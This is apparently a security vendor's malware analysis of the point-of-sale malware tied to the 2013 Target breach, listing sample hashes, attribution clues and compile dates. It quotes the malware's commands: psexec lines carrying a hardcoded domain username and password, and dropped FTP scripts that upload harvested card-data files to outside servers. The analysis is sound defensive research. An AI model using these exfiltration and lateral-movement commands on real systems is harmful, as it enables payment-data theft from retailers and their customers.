In the last 24 hours, McAfee Labs has started to piece together more and more detail on the malware that is apparently tied to the campaign against Target. To recap, in November 2013 the retailer was compromised via undisclosed methods. The attackers were able to plant point-of-sale malware and intercept approximately 110,000,000 records worth of payments, transactions, and other personally identifiable data. Working backward, we can start to see evidence of the activity in December (prior to the story’s breaking) based on underground chatter, VirusTotal submissions, and other open-source intelligence sources.
Although there is no official confirmation, we have credible evidence to indicate that the malware used in the Target stores attack is related to existing malware kits sold in underground forums. Related samples to date are somewhat similar in function to (and possibly derived from) known “BlackPOS” samples.
Sample Information/Sources
- ce0296e2d77ec3bb112e270fc260f274–ThreatExpert (cache)
- F45F8DF2F476910EE8502851F84D1A6E–ThreatExpert (cache)
- 7f1e4548790e7d93611769439a8b39f2–VirusTotal
- 4d445b11f9cc3334a4925a7ae5ebb2b7–VirusTotal
- 762ddb31c0a10a54f38c82efa0d0a014–Virus Total
- c0c9c5e1f5a9c7a3a5043ad9c0afa5fd–VirusTotal
7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 are uploaders that reveal many useful details about data collection, data transfer, and possibly the actor behind the campaign.
Possible Actor/Attribution Data
Both uploaders contain the following string (compile path)
- z:\Projects\Rescator\uploader\Debug\scheck.pdb
Rescator is a known actor in various cybercrime forums:
Data Collection and Transfer
Data is collected and transferred to internal shares via the following command syntax:
- c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p backupu$r cmd /c “taskkill /im bladelogic.exe /f”
- c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p backupu$r -d bladelogic
- c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c move \\10.116.240.31\nt\twain_32a.dll c:\program files\xxxxx\xxxxx\temp\data_2014_1_16_15_30.txt
- c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt
“ttcopscli3acs” is reportedly a Windows domain name used within Target stores.
7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 drop the following script upon execution:
——————————————
open xxx.xxx.xxx.xx
%name%
%password%
cd public_html
cd cgi-bin
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_%_%_%%_%%.txt
quit
——————————————
Similar scripts are present in 762ddb31c0a10a54f38c82efa0d0a014 and c0c9c5e1f5a9c7a3a5043ad9c0afa5fd.
——————————————
open xx.xxx.xxx.xx
%name%
%password%
cd 001
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt
quit
——————————————
——————————————
open xx.xx.xxx.xx
%name%
%password%
cd etc
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt
quit
——————————————
Compilation Dates
- 762ddb31c0a10a54f38c82efa0d0a014 – Sat Nov 30 17:52:00 2013 UTC
- 4d445b11f9cc3334a4925a7ae5ebb2b7 – Sat Nov 30 17:21:17 2013 UTC
- c0c9c5e1f5a9c7a3a5043ad9c0afa5fd – Tue Dec 3 00:15:01 2013 UTC
- 7f1e4548790e7d93611769439a8b39f2 – Sat Nov 30 17:38:23 2013 UTC